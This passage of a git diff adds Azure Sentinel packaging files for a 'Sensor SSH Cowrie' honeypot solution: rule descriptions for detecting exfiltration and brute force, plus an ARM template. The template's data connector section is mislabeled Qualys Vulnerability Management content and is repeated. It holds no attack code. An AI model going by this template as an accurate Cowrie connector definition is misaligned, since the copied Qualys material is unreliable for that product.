attempts to execute files or scripts that are unusual or not typical for the environment." + } + } + ] + }, + { + "name": "analytic3", + "type": "Microsoft.Common.Section", + "label": "Detect File Uploads and Downloads", + "elements": [ + { + "name": "analytic3-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This Creates an incident when identifying file uploads and downloads to detect potential exfiltration or data theft activities." + } + } + ] + }, + { + "name": "analytic4", + "type": "Microsoft.Common.Section", + "label": "Detect Connection Events", + "elements": [ + { + "name": "analytic4-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This Creates an incident when identifying connection events to detect unusual patterns in access or possible reconnaissance activity." + } + } + ] + }, + { + "name": "analytic5", + "type": "Microsoft.Common.Section", + "label": "Alert on High Number of Failed Login Attempts", + "elements": [ + { + "name": "analytic5-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This Creates an incident when identifying brute-force or password-guessing attacks by monitoring a high volume of failed login attempts." + } + } + ] + } + ] + } + ], + "outputs": { + "workspace-location": "[first(map(filter(basics('getLAWorkspace').value, (filter) => and(contains(toLower(filter.id), toLower(resourceGroup().name)),equals(filter.name,basics('workspace')))), (item) => item.location))]", + "location": "[location()]", + "workspace": "[basics('workspace')]" + } + } +} diff --git a/Solutions/Sensor SSH Cowrie/Package/mainTemplate.tbd b/Solutions/Sensor SSH Cowrie/Package/mainTemplate.tbd new file mode 100644 index 00000000000..a9bf3767874 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/mainTemplate.tbd @@ -0,0 +1,7765 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "author": "Microsoft - support@microsoft.com", + "comments": "Solution template for Cowrie" + }, + "parameters": { + "location": { + "type": "string", + "minLength": 1, + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Not used, but needed to pass arm-ttk test `Location-Should-Not-Be-Hardcoded`. We instead use the `workspace-location` which is derived from the LA workspace" + } + }, + "workspace-location": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "[concat('Region to deploy solution resources -- separate from location selection',parameters('location'))]" + } + }, + "workspace": { + "defaultValue": "", + "type": "string", + "metadata": { + "description": "Workspace name for Log Analytics where Microsoft Sentinel is setup" + } + }, + "workbook1-name": { + "type": "string", + "defaultValue": "Cowrie", + "minLength": 1, + "metadata": { + "description": "Name for the workbook" + } + } + }, + "variables": { + "email": "support@microsoft.com", + "_email": "[variables('email')]", + "_solutionName": "Sensor SSH Cowrie", + "_solutionVersion": "3.0.0", + "solutionId": "azuresentinel.azure-sentinel-sensor-ssh-cowrie", + "_solutionId": "[variables('solutionId')]", + "uiConfigId1": "Cowrie", + "_uiConfigId1": "[variables('uiConfigId1')]", + "dataConnectorContentId1": "Cowrie", + "_dataConnectorContentId1": "[variables('dataConnectorContentId1')]", + "dataConnectorId1": "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/dataConnectors', variables('_dataConnectorContentId1'))]", + "_dataConnectorId1": "[variables('dataConnectorId1')]", + "dataConnectorTemplateSpecName1": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-dc-',uniquestring(variables('_dataConnectorContentId1'))))]", + "dataConnectorVersion1": "2.0.0", + "_dataConnectorcontentProductId1": "[concat(take(variables('_solutionId'),50),'-','dc','-', uniqueString(concat(variables('_solutionId'),'-','DataConnector','-',variables('_dataConnectorContentId1'),'-', variables('dataConnectorVersion1'))))]", + "workbookVersion1": "1.0.0", + "workbookContentId1": "CowrieWorkbook", + "workbookId1": "[resourceId('Microsoft.Insights/workbooks', variables('workbookContentId1'))]", + "workbookTemplateSpecName1": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-wb-',uniquestring(variables('_workbookContentId1'))))]", + "_workbookContentId1": "[variables('workbookContentId1')]", + "workspaceResourceId": "[resourceId('microsoft.OperationalInsights/Workspaces', parameters('workspace'))]", + "_workbookcontentProductId1": "[concat(take(variables('_solutionId'),50),'-','wb','-', uniqueString(concat(variables('_solutionId'),'-','Workbook','-',variables('_workbookContentId1'),'-', variables('workbookVersion1'))))]", + "analyticRuleObject1": { + "analyticRuleVersion1": "1.0.1", + "_analyticRulecontentId1": "ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2", + "analyticRuleId1": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', 'ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2')]", + "analyticRuleTemplateSpecName1": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2')))]", + "_analyticRulecontentProductId1": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2','-', '1.0.1')))]" + }, + "analyticRuleObject2": { + "analyticRuleVersion2": "1.0.1", + "_analyticRulecontentId2": "4a566fa4-f901-44fd-9890-a476d163e86a", + "analyticRuleId2": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', '4a566fa4-f901-44fd-9890-a476d163e86a')]", + "analyticRuleTemplateSpecName2": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('4a566fa4-f901-44fd-9890-a476d163e86a')))]", + "_analyticRulecontentProductId2": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','4a566fa4-f901-44fd-9890-a476d163e86a','-', '1.0.1')))]" + }, + "analyticRuleObject3": { + "analyticRuleVersion3": "1.0.1", + "_analyticRulecontentId3": "53016cac-ca6c-4b2b-a4c4-7325afcb9502", + "analyticRuleId3": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', '53016cac-ca6c-4b2b-a4c4-7325afcb9502')]", + "analyticRuleTemplateSpecName3": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('53016cac-ca6c-4b2b-a4c4-7325afcb9502')))]", + "_analyticRulecontentProductId3": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','53016cac-ca6c-4b2b-a4c4-7325afcb9502','-', '1.0.1')))]" + }, + "analyticRuleObject4": { + "analyticRuleVersion4": "1.0.1", + "_analyticRulecontentId4": "f72805a7-b8c5-45fb-aacf-d0db7e0bf49b", + "analyticRuleId4": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', 'f72805a7-b8c5-45fb-aacf-d0db7e0bf49b')]", + "analyticRuleTemplateSpecName4": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('f72805a7-b8c5-45fb-aacf-d0db7e0bf49b')))]", + "_analyticRulecontentProductId4": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','f72805a7-b8c5-45fb-aacf-d0db7e0bf49b','-', '1.0.1')))]" + }, + "analyticRuleObject5": { + "analyticRuleVersion5": "1.0.1", + "_analyticRulecontentId5": "b86b27e3-adb9-4f39-8c4e-0b7300031984", + "analyticRuleId5": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', 'b86b27e3-adb9-4f39-8c4e-0b7300031984')]", + "analyticRuleTemplateSpecName5": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('b86b27e3-adb9-4f39-8c4e-0b7300031984')))]", + "_analyticRulecontentProductId5": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','b86b27e3-adb9-4f39-8c4e-0b7300031984','-', '1.0.1')))]" + }, + "CowrieCustomConnector": "CowrieCustomConnector", + "_CowrieCustomConnector": "[variables('CowrieCustomConnector')]", + "TemplateEmptyArray": "[json('[]')]", + "_solutioncontentProductId": "[concat(take(variables('_solutionId'),50),'-','sl','-', uniqueString(concat(variables('_solutionId'),'-','Solution','-',variables('_solutionId'),'-', variables('_solutionVersion'))))]" + }, + "resources": [ + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('dataConnectorTemplateSpecName1')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM data connector with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('dataConnectorVersion1')]", + "parameters": {}, + "variables": {}, + "resources": [ + { + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',variables('_dataConnectorContentId1'))]", + "apiVersion": "2021-03-01-preview", + "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", + "location": "[parameters('workspace-location')]", + "kind": "GenericUI", + "properties": { + "connectorUiConfig": { + "id": "[variables('_uiConfigId1')]", + "title": "Qualys Vulnerability Management (using Azure Functions)", + "publisher": "Qualys", + "descriptionMarkdown": "The [Qualys Vulnerability Management (VM)](https://www.qualys.com/apps/vulnerability-management/) data connector provides the capability to ingest vulnerability host detection data into Microsoft Sentinel through the Qualys API. The connector provides visibility into host detection data from vulerability scans. This connector provides Microsoft Sentinel the capability to view dashboards, create custom alerts, and improve investigation ", + "graphQueries": [ + { + "metricName": "Total data received", + "legend": "QualysHostDetectionV2_CL", + "baseQuery": "QualysHostDetectionV2_CL" + }, + { + "metricName": "Total data received", + "legend": "QualysHostDetection_CL", + "baseQuery": "QualysHostDetection_CL" + } + ], + "sampleQueries": [ + { + "description": "Top 10 Qualys V2 Vulerabilities detected", + "query": "QualysHostDetectionV2_CL\n | extend Vulnerability = tostring(QID_s)\n | summarize count() by Vulnerability\n | top 10 by count_" + }, + { + "description": "Top 10 Vulerabilities detected", + "query": "QualysHostDetection_CL\n | mv-expand todynamic(Detections_s)\n | extend Vulnerability = tostring(Detections_s.Results)\n | summarize count() by Vulnerability\n | top 10 by count_" + } + ], + "dataTypes": [ + { + "name": "QualysHostDetectionV2_CL", + "lastDataReceivedQuery": "QualysHostDetectionV2_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + }, + { + "name": "QualysHostDetection_CL", + "lastDataReceivedQuery": "QualysHostDetection_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + } + ], + "connectivityCriterias": [ + { + "type": "IsConnectedQuery", + "value": [ + "QualysHostDetectionV2_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)", + "QualysHostDetection_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)" + ] + } + ], + "availability": { + "status": 1, + "isPreview": false + }, + "permissions": { + "resourceProvider": [ + { + "provider": "Microsoft.OperationalInsights/workspaces", + "permissionsDisplayText": "read and write permissions on the workspace are required.", + "providerDisplayName": "Workspace", + "scope": "Workspace", + "requiredPermissions": { + "write": true, + "read": true, + "delete": true + } + }, + { + "provider": "Microsoft.OperationalInsights/workspaces/sharedKeys", + "permissionsDisplayText": "read permissions to shared keys for the workspace are required. [See the documentation to learn more about workspace keys](https://docs.microsoft.com/azure/azure-monitor/platform/agent-windows#obtain-workspace-id-and-key).", + "providerDisplayName": "Keys", + "scope": "Workspace", + "requiredPermissions": { + "action": true + } + } + ], + "customs": [ + { + "name": "Microsoft.Web/sites permissions", + "description": "Read and write permissions to Azure Functions to create a Function App is required. [See the documentation to learn more about Azure Functions](https://docs.microsoft.com/azure/azure-functions/)." + }, + { + "name": "Qualys API Key", + "description": "A Qualys VM API username and password is required. [See the documentation to learn more about Qualys VM API](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf)." + } + ] + }, + "instructionSteps": [ + { + "description": ">**NOTE:** This connector uses Azure Functions to connect to Qualys VM to pull its logs into Microsoft Sentinel. This might result in additional data ingestion costs. Check the [Azure Functions pricing page](https://azure.microsoft.com/pricing/details/functions/) for details." + }, + { + "description": ">**(Optional Step)** Securely store workspace and API authorization key(s) or token(s) in Azure Key Vault. Azure Key Vault provides a secure mechanism to store and retrieve key values. [Follow these instructions](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) to use Azure Key Vault with an Azure Function App." + }, + { + "description": "**STEP 1 - Configuration steps for the Qualys VM API**\n\n1. Log into the Qualys Vulnerability Management console with an administrator account, select the **Users** tab and the **Users** subtab. \n2. Click on the **New** drop-down menu and select **Users..**\n3. Create a username and password for the API account. \n4. In the **User Roles** tab, ensure the account role is set to **Manager** and access is allowed to **GUI** and **API**\n4. Log out of the administrator account and log into the console with the new API credentials for validation, then log out of the API account. \n5. Log back into the console using an administrator account and modify the API accounts User Roles, removing access to **GUI**. \n6. Save all changes." + }, + { + "description": "**STEP 2 - Choose ONE from the following two deployment options to deploy the connector and the associated Azure Function**\n\n>**IMPORTANT:** Before deploying the Qualys VM connector, have the Workspace ID and Workspace Primary Key (can be copied from the following), as well as the Qualys VM API Authorization Key(s), readily available.", + "instructions": [ + { + "parameters": { + "fillWith": [ + "WorkspaceId" + ], + "label": "Workspace ID" + }, + "type": "CopyableLabel" + }, + { + "parameters": { + "fillWith": [ + "PrimaryKey" + ], + "label": "Primary Key" + }, + "type": "CopyableLabel" + } + ] + }, + { + "description": ">**NOTE:** This connector has been updated, if you have previously deployed an earlier version, and want to update, please delete the existing Qualys VM Azure Function before redeploying this version. Please use Qualys V2 version Workbook, detections. " + }, + { + "description": "Use this method for automated deployment of the Qualys VM connector using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2) [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2-gov)\n2. Select the preferred **Subscription**, **Resource Group** and **Location**. \n3. Enter the **Workspace ID**, **Workspace Key**, **API Username**, **API Password** , update the **URI**, and any additional URI **Filter Parameters** (each filter should be separated by an \"&\" symbol, no spaces.) \n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348) -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format. \n - The default **Time Interval** is set to pull the last five (5) minutes of data. If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly (in the function.json file, post deployment) to prevent overlapping data ingestion. \n> - Note: If using Azure Key Vault secrets for any of the values above, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details. \n4. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n5. Click **Purchase** to deploy.", + "title": "Option 1 - Azure Resource Manager (ARM) Template" + }, + { + "description": "Use the following step-by-step instructions to deploy the Quayls VM connector manually with Azure Functions.", + "title": "Option 2 - Manual Deployment of Azure Functions" + }, + { + "description": "**1. Create a Function App**\n\n1. From the Azure Portal, navigate to [Function App](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites/kind/functionapp), and select **+ Add**.\n2. In the **Basics** tab, ensure Runtime stack is set to **Powershell Core**. \n3. In the **Hosting** tab, ensure the **Consumption (Serverless)** plan type is selected.\n4. Make other preferrable configuration changes, if needed, then click **Create**." + }, + { + "description": "**2. Import Function App Code**\n\n1. In the newly created Function App, select **Functions** on the left pane and click **+ New Function**.\n2. Select **Timer Trigger**.\n3. Enter a unique Function **Name** and leave the default cron schedule of every 5 minutes, then click **Create**.\n5. Click on **Code + Test** on the left pane. \n6. Copy the [Function App Code](https://aka.ms/sentinel-QualysVM-functioncodeV2) and paste into the Function App `run.ps1` editor.\n7. Click **Save**." + }, + { + "description": "**3. Configure the Function App**\n\n1. In the Function App, select the Function App Name and select **Configuration**.\n2. In the **Application settings** tab, select **+ New application setting**.\n3. Add each of the following eight (8) application settings individually, with their respective string values (case-sensitive): \n\t\tapiUsername\n\t\tapiPassword\n\t\tworkspaceID\n\t\tworkspaceKey\n\t\turi\n\t\tfilterParameters\n\t\ttimeInterval\n\t\tlogAnalyticsUri (optional)\n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348). The `uri` value must follow the following schema: `https:///api/2.0/fo/asset/host/vm/detection/?action=list&vm_processed_after=` -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format.\n> - Add any additional filter parameters, for the `filterParameters` variable, that need to be appended to the URI. Each parameter should be seperated by an \"&\" symbol and should not include any spaces.\n> - Set the `timeInterval` (in minutes) to the value of `5` to correspond to the Timer Trigger of every `5` minutes. If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly to prevent overlapping data ingestion.\n> - Note: If using Azure Key Vault, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details.\n> - Use logAnalyticsUri to override the log analytics API endpoint for dedicated cloud. For example, for public cloud, leave the value empty; for Azure GovUS cloud environment, specify the value in the following format: `https://.ods.opinsights.azure.us`.\n4. Once all application settings have been entered, click **Save**." + }, + { + "description": "**4. Configure the host.json**.\n\nDue to the potentially large amount of Qualys host detection data being ingested, it can cause the execution time to surpass the default Function App timeout of five (5) minutes. Increase the default timeout duration to the maximum of ten (10) minutes, under the Consumption Plan, to allow more time for the Function App to execute.\n\n1. In the Function App, select the Function App Name and select the **App Service Editor** blade.\n2. Click **Go** to open the editor, then select the **host.json** file under the **wwwroot** directory.\n3. Add the line `\"functionTimeout\": \"00:10:00\",` above the `managedDependancy` line \n4. Ensure **SAVED** appears on the top right corner of the editor, then exit the editor.\n\n> NOTE: If a longer timeout duration is required, consider upgrading to an [App Service Plan](https://docs.microsoft.com/azure/azure-functions/functions-scale#timeout)" + } + ], + "metadata": { + "id": "9118ddc8-ca2c-48d3-8b10-9b198bd1ab3e", + "version": "2.0.0", + "kind": "dataConnector", + "source": { + "kind": "community" + }, + "author": { + "name": "Qualys VM" + }, + "support": { + "tier": "developer", + "name": "Qualys VM", + "email": "support@qualys.com", + "link": "https://www.qualys.com/support" + } + } + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2023-04-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('DataConnector-', last(split(variables('_dataConnectorId1'),'/'))))]", + "properties": { + "parentId": "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/dataConnectors', variables('_dataConnectorContentId1'))]", + "contentId": "[variables('_dataConnectorContentId1')]", + "kind": "DataConnector", + "version": "[variables('dataConnectorVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_dataConnectorContentId1')]", + "contentKind": "DataConnector", + "displayName": "Qualys Vulnerability Management (using Azure Functions)", + "contentProductId": "[variables('_dataConnectorcontentProductId1')]", + "id": "[variables('_dataConnectorcontentProductId1')]", + "version": "[variables('dataConnectorVersion1')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2023-04-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('DataConnector-', last(split(variables('_dataConnectorId1'),'/'))))]", + "dependsOn": [ + "[variables('_dataConnectorId1')]" + ], + "location": "[parameters('workspace-location')]", + "properties": { + "parentId": "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/dataConnectors', variables('_dataConnectorContentId1'))]", + "contentId": "[variables('_dataConnectorContentId1')]", + "kind": "DataConnector", + "version": "[variables('dataConnectorVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + }, + { + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',variables('_dataConnectorContentId1'))]", + "apiVersion": "2021-03-01-preview", + "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", + "location": "[parameters('workspace-location')]", + "kind": "GenericUI", + "properties": { + "connectorUiConfig": { + "title": "Qualys Vulnerability Management (using Azure Functions)", + "publisher": "Qualys", + "descriptionMarkdown": "The [Qualys Vulnerability Management (VM)](https://www.qualys.com/apps/vulnerability-management/) data connector provides the capability to ingest vulnerability host detection data into Microsoft Sentinel through the Qualys API. The connector provides visibility into host detection data from vulerability scans. This connector provides Microsoft Sentinel the capability to view dashboards, create custom alerts, and improve investigation ", + "graphQueries": [ + { + "metricName": "Total data received", + "legend": "QualysHostDetectionV2_CL", + "baseQuery": "QualysHostDetectionV2_CL" + }, + { + "metricName": "Total data received", + "legend": "QualysHostDetection_CL", + "baseQuery": "QualysHostDetection_CL" + } + ], + "dataTypes": [ + { + "name": "QualysHostDetectionV2_CL", + "lastDataReceivedQuery": "QualysHostDetectionV2_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + }, + { + "name": "QualysHostDetection_CL", + "lastDataReceivedQuery": "QualysHostDetection_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + } + ], + "connectivityCriterias": [ + { + "type": "IsConnectedQuery", + "value": [ + "QualysHostDetectionV2_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)", + "QualysHostDetection_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)" + ] + } + ], + "sampleQueries": [ + { + "description": "Top 10 Qualys V2 Vulerabilities detected", + "query": "QualysHostDetectionV2_CL\n | extend Vulnerability = tostring(QID_s)\n | summarize count() by Vulnerability\n | top 10 by count_" + }, + { + "description": "Top 10 Vulerabilities detected", + "query": "QualysHostDetection_CL\n | mv-expand todynamic(Detections_s)\n | extend Vulnerability = tostring(Detections_s.Results)\n | summarize count() by Vulnerability\n | top 10 by count_" + } + ], + "availability": { + "status": 1, + "isPreview": false + }, + "permissions": { + "resourceProvider": [ + { + "provider": "Microsoft.OperationalInsights/workspaces", + "permissionsDisplayText": "read and write permissions on the workspace are required.", + "providerDisplayName": "Workspace", + "scope": "Workspace", + "requiredPermissions": { + "write": true, + "read": true, + "delete": true + } + }, + { + "provider": "Microsoft.OperationalInsights/workspaces/sharedKeys", + "permissionsDisplayText": "read permissions to shared keys for the workspace are required. [See the documentation to learn more about workspace keys](https://docs.microsoft.com/azure/azure-monitor/platform/agent-windows#obtain-workspace-id-and-key).", + "providerDisplayName": "Keys", + "scope": "Workspace", + "requiredPermissions": { + "action": true + } + } + ], + "customs": [ + { + "name": "Microsoft.Web/sites permissions", + "description": "Read and write permissions to Azure Functions to create a Function App is required. [See the documentation to learn more about Azure Functions](https://docs.microsoft.com/azure/azure-functions/)." + }, + { + "name": "Qualys API Key", + "description": "A Qualys VM API username and password is required. [See the documentation to learn more about Qualys VM API](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf)." + } + ] + }, + "instructionSteps": [ + { + "description": ">**NOTE:** This connector uses Azure Functions to connect to Qualys VM to pull its logs into Microsoft Sentinel. This might result in additional data ingestion costs. Check the [Azure Functions pricing page](https://azure.microsoft.com/pricing/details/functions/) for details." + }, + { + "description": ">**(Optional Step)** Securely store workspace and API authorization key(s) or token(s) in Azure Key Vault. Azure Key Vault provides a secure mechanism to store and retrieve key values. [Follow these instructions](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) to use Azure Key Vault with an Azure Function App." + }, + { + "description": "**STEP 1 - Configuration steps for the Qualys VM API**\n\n1. Log into the Qualys Vulnerability Management console with an administrator account, select the **Users** tab and the **Users** subtab. \n2. Click on the **New** drop-down menu and select **Users..**\n3. Create a username and password for the API account. \n4. In the **User Roles** tab, ensure the account role is set to **Manager** and access is allowed to **GUI** and **API**\n4. Log out of the administrator account and log into the console with the new API credentials for validation, then log out of the API account. \n5. Log back into the console using an administrator account and modify the API accounts User Roles, removing access to **GUI**. \n6. Save all changes." + }, + { + "description": "**STEP 2 - Choose ONE from the following two deployment options to deploy the connector and the associated Azure Function**\n\n>**IMPORTANT:** Before deploying the Qualys VM connector, have the Workspace ID and Workspace Primary Key (can be copied from the following), as well as the Qualys VM API Authorization Key(s), readily available.", + "instructions": [ + { + "parameters": { + "fillWith": [ + "WorkspaceId" + ], + "label": "Workspace ID" + }, + "type": "CopyableLabel" + }, + { + "parameters": { + "fillWith": [ + "PrimaryKey" + ], + "label": "Primary Key" + }, + "type": "CopyableLabel" + } + ] + }, + { + "description": ">**NOTE:** This connector has been updated, if you have previously deployed an earlier version, and want to update, please delete the existing Qualys VM Azure Function before redeploying this version. Please use Qualys V2 version Workbook, detections. " + }, + { + "description": "Use this method for automated deployment of the Qualys VM connector using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2) [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2-gov)\n2. Select the preferred **Subscription**, **Resource Group** and **Location**. \n3. Enter the **Workspace ID**, **Workspace Key**, **API Username**, **API Password** , update the **URI**, and any additional URI **Filter Parameters** (each filter should be separated by an \"&\" symbol, no spaces.) \n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348) -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format. \n - The default **Time Interval** is set to pull the last five (5) minutes of data. If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly (in the function.json file, post deployment) to prevent overlapping data ingestion. \n> - Note: If using Azure Key Vault secrets for any of the values above, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details. \n4. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n5. Click **Purchase** to deploy.", + "title": "Option 1 - Azure Resource Manager (ARM) Template" + }, + { + "description": "Use the following step-by-step instructions to deploy the Quayls VM connector manually with Azure Functions.", + "title": "Option 2 - Manual Deployment of Azure Functions" + }, + { + "description": "**1. Create a Function App**\n\n1. From the Azure Portal, navigate to [Function App](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites/kind/functionapp), and select **+ Add**.\n2. In the **Basics** tab, ensure Runtime stack is set to **Powershell Core**. \n3. In the **Hosting** tab, ensure the **Consumption (Serverless)** plan type is selected.\n4. Make other preferrable configuration changes, if needed, then click **Create**." + }, + { + "description": "**2. Import Function App Code**\n\n1. In the newly created Function App, select **Functions** on the left pane and click **+ New Function**.\n2. Select **Timer Trigger**.\n3. Enter a unique Function **Name** and leave the default cron schedule of every 5 minutes, then click **Create**.\n5. Click on **Code + Test** on the left pane. \n6. Copy the [Function App Code](https://aka.ms/sentinel-QualysVM-functioncodeV2) and paste into the Function App `run.ps1` editor.\n7. Click **Save**." + }, + { + "description": "**3. Configure the Function App**\n\n1. In the Function App, select the Function App Name and select **Configuration**.\n2. In the **Application settings** tab, select **+ New application setting**.\n3. Add each of the following eight (8) application settings individually, with their respective string values (case-sensitive): \n\t\tapiUsername\n\t\tapiPassword\n\t\tworkspaceID\n\t\tworkspaceKey\n\t\turi\n\t\tfilterParameters\n\t\ttimeInterval\n\t\tlogAnalyticsUri (optional)\n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348). The `uri` value must follow the following schema: `https:///api/2.0/fo/asset/host/vm/detection/?action=list&vm_processed_after=` -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format.\n> - Add any additional filter parameters, for the `filterParameters` variable, that need to be appended to the URI. Each parameter should be seperated by an \"&\" symbol and should not include any spaces.\n> - Set the `timeInterval` (in minutes) to the value of `5` to correspond to the Timer Trigger of every `5` minutes. If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly to prevent overlapping data ingestion.\n> - Note: If using Azure Key Vault, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details.\n> - Use logAnalyticsUri to override the log analytics API endpoint for dedicated cloud. For example, for public cloud, leave the value empty; for Azure GovUS cloud environment, specify the value in the following format: `https://.ods.opinsights.azure.us`.\n4. Once all application settings have been entered, click **Save**." + }, 